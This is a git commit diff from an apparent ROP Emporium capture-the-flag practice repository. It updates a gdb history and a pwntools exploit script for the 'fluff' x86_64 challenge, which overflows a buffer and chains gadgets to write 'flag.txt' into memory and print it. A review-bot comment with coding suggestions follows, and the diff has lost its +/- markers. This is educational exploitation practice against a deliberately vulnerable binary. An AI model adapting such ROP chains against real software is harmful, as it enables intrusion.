deleted: x86_64/badchars/core

modified:   x86_64/fluff/.gdb_history
	deleted:    x86_64/fluff/core
	modified:   x86_64/fluff/exploit.py
	deleted:    x86_64/ret2win/core
	deleted:    x86_64/split/core
	deleted:    x86_64/write4/core
This commit is contained in:
Brett Weiland 2020-12-18 01:42:14 -06:00
parent 4c25bd9188
commit 406768c5fe
7 changed files with 46 additions and 31 deletions

Binary file not shown.


@ -1,19 +1,4 @@
quit
quit
continue
nexti
nexti
info reg rdi
stepi
nexti
info reg rcx
nexti
info reg rbx
stepi
info reg rdx
inro reg rbx
info reg rbx
quit
stepi
continue
stepi
@ -237,3 +222,35 @@ x/x 0x601be0 + 8
x/x 0x601be0 + 9
x/x 0x601be0 + 10
quit
continue
context
x/x 0x7fff0b74fed0
x/100x 0x7fff0b74fed0
quit
break *0x400639
continue
context
continue
x/s 0x601be0
continue
x/s 0x601be0
stepi
stepi
x/s 0x601be0
quit
continue
continue
quit
break *0x00000000004006a3
continue
continue
quit
break pwnme
run
continue
break *0x00000000004006a3
continue
info reg rip
continue
info reg rip
quit

Binary file not shown.


@ -13,37 +13,35 @@ letter_lookups = {
def write_str(dest, string, payload):
payload += p64(0x00000000004006a3)
payload += p64(dest)
for c in string:
payload += p64(0x40062a)
payload += p64(0x4000) # if things go wrong, check endian/order
payload += p64(0x0000000000400610)
payload += p64(1)
payload += p64(0x40062a)
payload += p64(0x4000)
payload += p64(letter_lookups[string[0]] - 0x3ef2)
payload += p64(0x400628)
payload += p64(0x400639)
for c in string[1:]:
payload += p64(0x40062b)
payload += p64(letter_lookups[c] - 0x3ef2)
payload += p64(0x0000000000400610)
payload += p64(0)
payload += p64(1)
payload += p64(0x400628)
payload += p64(0x400639)
return(payload)
prog = gdb.debug('./fluff', gdbscript='''
break *pwnme + 151
'''
)
prog = process('./fluff')
payload = b''
for c in range(40):
payload += b'a'
payload = write_str(0x0000000000600df0 + 0x00000df0, 'flag.txt', payload)
payload += p64(0x00000000004006a3)
payload += p64(0x601be0) # set rdi
payload += p64(0x601be0)
payload += p64(0x0000000000400510)
payload += b"\n"
prog.sendline(payload)
sleep(1)
print(str(prog.recv(), 'UTF-8'))
prog.interactive()
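Review bot: The final read, `print(str(prog.recv(), 'UTF-8'))`, raises UnicodeDecodeError and never reaches `prog.interactive()` if any byte the target sends back is not valid UTF-8, which is plausible the moment it echoes part of a payload built from `p64` addresses; `print(prog.recv().decode('utf-8', errors='replace'))` keeps the session alive either way. The preceding `sleep(1)` is a fixed wait rather than a read bounded by data or by a timeout, so on a slow host `recv()` may return only part of the output; `prog.recv(timeout=1)` would block until data arrives (up to one second) instead of waiting unconditionally. Separately, `write_str` has no docstring and encodes every gadget and offset as a bare literal (`0x4006a3`, `0x40062a`, `0x4000`, `0x3ef2`, `0x400628`, `0x400639`), so a reader cannot tell what each step of the chain does; a one-line docstring stating that it appears to append a chain that places `string` at `dest` and returns the extended payload, plus one named module-level constant per address with a comment describing its gadget, would make the chain reviewable. The rendered section has lost its +/- markers, so which of these lines are new in this commit cannot be told from the page.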

Binary file not shown.

Binary file not shown.

Binary file not shown.